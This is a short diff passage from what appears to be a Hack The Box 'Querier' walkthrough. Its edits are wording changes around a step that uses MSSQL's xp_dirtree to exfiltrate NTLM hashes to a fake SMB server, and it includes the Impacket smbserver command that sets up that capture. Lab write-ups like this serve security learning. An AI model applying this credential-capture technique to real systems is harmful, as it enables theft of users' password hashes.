limbernie/limbernie.github.io/_posts/2019-06-22-querier-htb-walkthrough.md

 ## Undocumented Stored Procedure - `xp_dirtree`

-Now that we have access to a MSSQL shell, so to speak, we can execute `xp_dirtree` to exfiltrate NTLM hashes.
+Now that we have access to a MSSQL shell so to speak, we can execute `xp_dirtree` to exfiltrate NTLM hashes.
 But first, we need to set up a fake SMB server.

 Impacket provides an excellent SMB server right off the box.
-Let's run that like so.
+Let's run that.

 ```
 # impacket-smbserver deep /root/Downloads/querier -smb2support